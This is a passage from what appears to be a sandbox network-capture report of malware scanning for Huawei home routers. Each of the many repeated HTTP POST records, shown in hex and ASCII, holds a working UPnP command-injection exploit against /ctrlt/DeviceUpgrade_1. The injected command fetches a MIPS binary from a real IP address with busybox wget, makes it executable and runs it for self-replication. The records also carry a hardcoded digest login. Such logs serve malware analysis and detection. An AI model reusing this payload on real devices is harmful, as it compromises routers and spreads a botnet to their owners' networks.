20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1501192.168.2.133691241.143.235.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576093912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1502192.168.2.1343396157.52.186.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576106071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1503192.168.2.1359718197.248.59.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576134920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1504192.168.2.1341228157.59.175.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583409071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1505192.168.2.1356084197.57.112.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583664894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1506192.168.2.1349482204.161.113.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583703041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1507192.168.2.1347510157.95.2.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583708048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1508192.168.2.1354656157.133.130.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583723068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1509192.168.2.1348612197.149.29.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583734035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1510192.168.2.1348332157.153.138.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583753109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1511192.168.2.1350124157.103.94.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583776951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
